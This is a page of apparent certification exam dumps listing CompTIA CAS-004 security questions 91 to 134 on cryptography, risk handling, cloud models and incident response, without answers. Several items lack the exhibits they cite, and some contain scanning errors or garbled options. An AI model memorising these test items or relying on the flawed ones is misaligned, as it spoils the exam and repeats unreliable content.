Disable powershell.exe on all Microsoft Windows endpoints.

Restart Microsoft Windows Defender.

Configure the forward proxy to block 40.90.23.154.

Disable local administrator privileges on the endpoints.

Page 10 of 14

91. An administrator at a software development company would like to protect the integrity of the company's applications with digital signatures. The developers report that the signing process keeps failing on all applications. The same key pair used for signing, however, is working properly on the website, is valid, and is issued by a trusted CA.

Which of the following is MOST likely the cause of the signature failing?

The NTP server is set incorrectly for the developers

The CA has included the certificate in its CR

The certificate is set for the wrong key usage.

Each application is missing a SAN or wildcard entry on the certificate

92. A security administrator needs to recommend an encryption protocol after a legacy stream cipher was deprecated when a security flaw was discovered. The legacy cipher excelled at maintaining strong cryptographic security and provided great performance for a streaming video service.

Which of the following AES modes should the security administrator recommend given these requirements?

CTR

ECB

OF8

GCM

93. An organization developed a social media application that is used by customers in multiple remote geographic locations around the world. The organization’s headquarters and only datacenter are located in New York City.

The Chief Information Security Officer wants to ensure the following requirements are met for the social media application:

Low latency for all mobile users to improve the users’ experience

SSL offloading to improve web server performance

Protection against DoS and DDoS attacks

High availability

Which of the following should the organization implement to BEST ensure all requirements are met?

A cache server farm in its datacenter

A load-balanced group of reverse proxy servers with SSL acceleration

A CDN with the origin set to its datacenter

Dual gigabit-speed Internet connections with managed DDoS prevention

94. A software development company makes Its software version available to customers from a web portal. On several occasions, hackers were able to access the software repository to change the package that is automatically published on the website.

Which of the following would be the BEST technique to ensure the software the users download is the official software released by the company?

Distribute the software via a third-party repository.

Close the web repository and deliver the software via email.

Email the software link to all customers.

Display the SHA checksum on the website.

95. A company's finance department acquired a new payment system that exports data to an unencrypted file on the system. The company implemented controls on the file so only appropriate

personnel are allowed access.

Which of the following risk techniques did the department use in this situation?

Avoid

Transfer

Mitigate

96. Which of the following terms refers to the delivery of encryption keys to a CASB or a third-party entity?

Key sharing

Key distribution

Key recovery

Key escrow

97. An organization is assessing the security posture of a new SaaS CRM system that handles sensitive Pll and identity information, such as passport numbers. The SaaS CRM system does not meet the organization's current security standards.

The assessment identifies the following:

1- There will be a $20,000 per day revenue loss for each day the system is delayed going into production.

2- The inherent risk is high.

3- The residual risk is low.

4- There will be a staged deployment to the solution rollout to the contact center.

Which of the following risk-handling techniques will BEST meet the organization's requirements?

Apply for a security exemption, as the risk is too high to accept.

Transfer the risk to the SaaS CRM vendor, as the organization is using a cloud service.

Accept the risk, as compensating controls have been implemented to manage the risk.

Avoid the risk by accepting the shared responsibility model with the SaaS CRM provider.

98. An organization decided to begin issuing corporate mobile device users microSD HSMs that must be installed in the mobile devices in order to access corporate resources remotely.

Which of the following features of these devices MOST likely led to this decision? (Select TWO.)

Software-backed keystore

Embedded cryptoprocessor

Hardware-backed public key storage

Support for stream ciphers

Decentralized key management

TPM 2.0 attestation services

99. In order to save money, a company has moved its data to the cloud with a low-cost provider. The company did not perform a security review prior to the move; however, the company requires all of its data to be stored within the country where the headquarters is located. A new employee on the security team has been asked to evaluate the current provider against the most important requirements.

The current cloud provider that the company is using offers:

• Only multitenant cloud hosting

• Minimal physical security

• Few access controls

• No access to the data center

The following information has been uncovered:

• The company is located in a known floodplain, which flooded last year.

• Government regulations require data to be stored within the country.

Which of the following should be addressed first?

Update the disaster recovery plan to account for natural disasters.

Establish a new memorandum of understanding with the cloud provider.

Establish a new service-level agreement with the cloud provider.

Provision services according to the appropriate legal requirements.

100. A security analyst has been tasked with providing key information in the risk register.

Which of the following outputs or results would be used to BEST provide the information needed to determine the security posture for a risk decision? (Select TWO).

Password cracker

SCAP scanner

Network traffic analyzer

Vulnerability scanner

Port scanner

Protocol analyzer

Page 11 of 14

101. A security analyst is reviewing network connectivity on a Linux workstation and examining the active TCP connections using the command line.

Which of the following commands would be the BEST to run to view only active Internet connections?

sudo netstat -antu | grep “LISTEN” | awk ‘{print$5}’

sudo netstat -nlt -p | grep “ESTABLISHED”

sudo netstat -plntu | grep -v “Foreign Address”

sudo netstat -pnut -w | column -t -s $’w’

sudo netstat -pnut | grep -P ^tcp

102. A company is in the process of refreshing its entire infrastructure The company has a business-critical process running on an old 2008 Windows server If this server fails, the company would lose millions of dollars in revenue.

Which of the following actions should the company should take?

Accept the risk as the cost of doing business

Create an organizational risk register for project prioritization

Calculate the ALE and conduct a cost-benefit analysis

Purchase insurance to offset the cost if a failure occurred

103. A company wants to quantify and communicate the effectiveness of its security controls but must establish measures.

Which of the following is MOST likely to be included in an effective assessment roadmap for these controls?

Create a change management process.

Establish key performance indicators.

Create an integrated master schedule.

Develop a communication plan.

Perform a security control assessment.

104. A Chief Information Officer (CIO) wants to implement a cloud solution that will satisfy the following requirements:

Support all phases of the SDLC.

Use tailored website portal software.

Allow the company to build and use its own gateway software.

Utilize its own data management platform.

Continue using agent-based security tools.

Which of the following cloud-computing models should the CIO implement?

SaaS

PaaS

MaaS

IaaS

105. To bring digital evidence in a court of law the evidence must be:

material

tangible

consistent

conserved

106. A financial institution generates a list of newly created accounts and sensitive information on a daily basis. The financial institution then sends out a file containing thousands of lines of data.

Which of the following would be the best way to reduce the risk of a malicious insider making changes to the file that could go undetected?

Write a SIEM rule that generates a critical alert when files are created on the application server.

Implement a FIM that automatically generates alerts when the file is accessed by IP addresses that are not associated with the application.

Create a script that compares the size of the file on an hourly basis and generates alerts when changes are identified.

Tune the rules on the host-based IDS for the application server to trigger automated alerts when the application server is accessed from the internet.

107. A security engineer is working for a service provider and analyzing logs and reports from a new EDR solution, which is installed on a small group of workstations. Later that day, another security engineer receives an email from two developers reporting the software being used for development activities is now blocked. The developers have not made any changes to the software being used.

Which of the following is the EDR reporting?

True positive

False negative

False positive

True negative

108. An engineering team is developing and deploying a fleet of mobile devices to be used for specialized inventory management purposes.

These devices should:

* Be based on open-source Android for user familiarity and ease.

* Provide a single application for inventory management of physical assets.

* Permit use of the camera be only the inventory application for the purposes of scanning

* Disallow any and all configuration baseline modifications.

* Restrict all access to any device resource other than those requirement?

Set an application wrapping policy, wrap the application, distributes the inventory APK via the MAM tool, and test the application restrictions.

Write a MAC sepolicy that defines domains with rules, label the inventory application, build the policy, and set to enforcing mode.

Swap out Android Linux kernel version for >2,4,0, but the internet build Android, remove unnecessary functions via MDL, configure to block network access, and perform integration testing

Build and install an Android middleware policy with requirements added, copy the file into/ user/init, and then built the inventory application.

109. A mobile application developer is creating a global, highly scalable, secure chat application. The developer would like to ensure the application is not susceptible to on-path attacks while the user is traveling in potentially hostile regions.

Which of the following would BEST achieve that goal?

Utilize the SAN certificate to enable a single certificate for all regions.

Deploy client certificates to all devices in the network.

Configure certificate pinning inside the application.

Enable HSTS on the application's server side for all communication.

110. A new web server must comply with new secure-by-design principles and PCI DSS. This includes mitigating the risk of an on-path attack.

A security analyst is reviewing the following web server configuration:

Which of the following ciphers should the security analyst remove to support the business requirements?

TLS_AES_128_CCM_8_SHA256

TLS_DHE_DSS_WITH_RC4_128_SHA

TLS_CHACHA20_POLY1305_SHA256

TLS_AES_128_GCM_SHA256

Page 12 of 14

111. A security engineer is reviewing a record of events after a recent data breach incident that Involved the following:

• A hacker conducted reconnaissance and developed a footprint of the company s Internet-facing web application assets.

• A vulnerability in a third-party horary was exploited by the hacker, resulting in the compromise of a local account.

• The hacker took advantage of the account's excessive privileges to access a data store and exfiltrate the data without detection.

Which of the following is the BEST solution to help prevent this type of attack from being successful in the future?

Dynamic analysis

Secure web gateway

Software composition analysis

User behavior analysis

Stateful firewall

112. An ISP is receiving reports from a portion of its customers who state that typosquatting is occurring when they type in a portion of the URL for the ISP's website. The reports state that customers are being directed to an advertisement website that is asking for personal information. The security team has verified the DNS system is returning proper results and has no known lOCs.

Which of the following should the security team implement to best mitigate this situation?

DNSSEC

DNS filtering

Multifactor authentication

Self-signed certificates

Revocation of compromised certificates

113. A security analyst is reviewing the following output:

Which of the following would BEST mitigate this type of attack?

Installing a network firewall

Placing a WAF inline

Implementing an IDS

Deploying a honeypot

114. A company has decided that only administrators are permitted to use PowerShell on their Windows computers.

Which of the following is the BEST way for an administrator to implement this decision?

Monitor the Application and Services Logs group within Windows Event Log.

Uninstall PowerSheII from all workstations.

Configure user settings in Group Policy.

Provide user education and training.

Block PowerSheII via HID

115. A systems engineer needs to develop a solution that uses digital certificates to allow authentication to laptops.

Which of the following authenticator types would be most appropriate for the engineer to include in the design?

TOTP token

Device certificate

Smart card

Biometric

116. The Chief information Officer (CIO) asks the system administrator to improve email security at the company based on the following requirements:

* Transaction being requested by unauthorized individuals.

* Complete discretion regarding client names, account numbers, and investment information.

* Malicious attackers using email to malware and ransomeware.

* Exfiltration of sensitive company information.

The cloud-based email solution will provide anti-malware reputation-based scanning, signature-based scanning, and sandboxing.

Which of the following is the BEST option to resolve the boar’s concerns for this email migration?

Data loss prevention

Endpoint detection response

SSL VPN

Application whitelisting

117. A company security engineer arrives at work to face the following scenario:

1) Website defacement

2) Calls from the company president indicating the website needs to be fixed Immediately because It Is damaging the brand

3) A Job offer from the company's competitor

4) A security analyst's investigative report, based on logs from the past six months, describing how lateral movement across the network from various IP addresses originating from a foreign adversary country resulted in exfiltrated data

Which of the following threat actors Is MOST likely involved?

Organized crime

Script kiddie

APT/nation-state

Competitor

118. A business stores personal client data of individuals residing in the EU in order to process requests for mortgage loan approvals.

Which of the following does the business’s IT manager need to consider?

The availability of personal data

The right to personal data erasure

The company’s annual revenue

The language of the web application

119. A cybersecurity analyst receives a ticket that indicates a potential incident is occurring. There has been a large in log files generated by a generated by a website containing a ‘’Contact US’’ form. The analyst must determine if the increase in website traffic is due to a recent marketing campaign of if this is a potential incident.

Which of the following would BEST assist the analyst?

Ensuring proper input validation is configured on the ‘’Contact US’’ form

Deploy a WAF in front of the public website

Checking for new rules from the inbound network IPS vendor

Running the website log files through a log reduction and analysis tool

120. Which of the following processes involves searching and collecting evidence during an investigation or lawsuit?

E-discovery

Review analysis

Information governance

Chain of custody

Page 13 of 14

121. The Chief Information Security Officer (CISO) is working with a new company and needs a legal “document to ensure all parties understand their roles during an assessment.

Which of the following should the CISO have each party sign?

SLA

ISA

Permissions and access

Rules of engagement

122. The Chief information Officer (CIO) wants to implement enterprise mobility throughout the organization. The goal is to allow employees access to company resources. However the CIO wants the ability to enforce configuration settings, manage data, and manage both company-owned and personal devices.

Which of the following should the CIO implement to achieve this goal?

BYOO

CYOD

COPE

MDM

123. A company hosts a large amount of data in blob storage for its customers. The company recently had a number of issues with this data being prematurely deleted before the scheduled backup processes could be completed. The management team has asked the security architect for a recommendation that allows blobs to be deleted occasionally, but only after a successful backup.

Which of the following solutions will BEST meet this requirement?

Mirror the blobs at a local data center.

Enable fast recovery on the storage account.

Implement soft delete for blobs.

Make the blob immutable.

124. An analyst execute a vulnerability scan against an internet-facing DNS server and receives the following report:

Which of the following tools should the analyst use FIRST to validate the most critical vulnerability?

Password cracker

Port scanner

Account enumerator

Exploitation framework

125. In order to authenticate employees who, call in remotely, a company's help desk staff must be able to view partial Information about employees because the full information may be considered sensitive.

Which of the following solutions should be implemented to authenticate employees?

Data scrubbing

Field masking

Encryption in transit

Metadata

126. A cloud security architect has been tasked with finding a solution for hardening VMS.

The solution must meet the following requirements:

• Data needs to be stored outside of the VMS.

• No unauthorized modifications to the VMS are allowed

• If a change needs to be done, a new VM needs to be deployed.

Which of the following is the BEST solution?

Immutable system

Data loss prevention

Storage area network

Baseline template

127. A security compliance requirement states that specific environments that handle sensitive data must be protected by need-to-know restrictions and can only connect to authorized endpoints. The requirement also states that a DLP solution within the environment must be used to control the data from leaving the environment.

Which of the following should be implemented for privileged users so they can support the environment from their workstations while remaining compliant?

NAC to control authorized endpoints

FIM on the servers storing the data

A jump box in the screened subnet

A general VPN solution to the primary network

128. A company is looking to fortify its cybersecurity defenses and is focusing on its network infrastructure. The solution cannot affect the availability of the company’s services to ensure false positives do not drop legitimate traffic.

Which of the following would satisfy the requirement?

NIDS

NIPS

WAF

Reverse proxy

129. An organization is developing a disaster recovery plan that requires data to be backed up and available at a moment’s notice.

Which of the following should the organization consider FIRST to address this requirement?

Implement a change management plan to ensure systems are using the appropriate versions.

Hire additional on-call staff to be deployed if an event occurs.

Design an appropriate warm site for business continuity.

Identify critical business processes and determine associated software and hardware requirements.

130. A security architect is working with a new customer to find a vulnerability assessment solution that meets the following requirements:

• Fast scanning

• The least false positives possible

• Signature-based

• A low impact on servers when performing a scan

In addition, the customer has several screened subnets, VLANs, and branch offices.

Which of the following will best meet the customer's needs?

Authenticated scanning

Passive scanning

Unauthenticated scanning

Agent-based scanning

Page 14 of 14

131. Users are reporting intermittent access issues with & new cloud application that was recently added to the network. Upon investigation, he scary administrator notices the human resources department Is able to run required queries with the new application, but the marketing department is unable to pull any needed reports on various resources using the new application.

Which of the following MOST likely needs to be done to avoid this in the future?

Modify the ACLs.

Review the Active Directory.

Update the marketing department's browser.

Reconfigure the WA

132. A security engineer is re-architecting a network environment that provides regional electric distribution services.

During a pretransition baseline assessment, the engineer identified the following security-relevant characteristics of the environment:

• Enterprise IT servers and supervisory industrial systems share the same subnet.

• Supervisory controllers use the 750MHz band to direct a portion of fielded PLCs.

• Command and telemetry messages from industrial control systems are unencrypted and unauthenticated.

Which of the following re-architecture approaches would be best to reduce the company's risk?

Implement a one-way guard between enterprise IT services and mission-critical systems, obfuscate legitimate RF signals by broadcasting noise, and implement modern protocols to authenticate ICS messages.

Characterize safety-critical versus non-safety-critical systems, isolate safety-critical systems from other systems, and increase the directionality of RF links in the field.

Create a new network segment for enterprise IT servers, configure NGFW to enforce a well-defined segmentation policy, and implement a WIDS to monitor the spectrum.

Segment supervisory controllers from field PLCs, disconnect the entire network from the internet, and use only the 750MHz link for controlling energy distribution services.

133. A security analyst discovered that the company's WAF was not properly configured.

The main web server was breached, and the following payload was found in one of the malicious requests:

Which of the following would BEST mitigate this vulnerability?

Network intrusion prevention

Data encoding

Input validation

CAPTCHA

134. Leveraging cryptographic solutions to protect data that is in use ensures the data is encrypted:

when it is passed across a local network.

in memory during processing

when it is written to a system’s solid-state drive.

by an enterprise hardware security module.

TAGS:

CAS-004, CAS-004 exam dumps

Notify of

Label

Name*

Email*

Website

Label

Name*

Email*

Website

0 Comments

Oldest

Newest Most Voted

Inline Feedbacks

View all comments

Posts

CompTIA Free Dumps

Get CAS-004 Dumps Full Version

Q&As: 440
Versions: PDF and Software Download Now

About Dumpsinfo

Dumpsinfo is a good platform providing the latest exam information and dumps questions for all IT certification exams. You can study all the latest exam dumps questions online.

[email protected]

Mon - Sat 9:00am - 6:00pm

Improve Your Knowledge with CAS-004 Exam Dumps

Related

Posts

Online XK0-005 Exam Dumps Help You Build Confidence

SY0-701 Dumps Questions – Effective Way to Get Certified

DS0-001 Dumps Questions Increase Your Chance of Success

Get Certified Easily with Online DA0-001 Dumps

About Us

EMAIL

Services

Opening Hours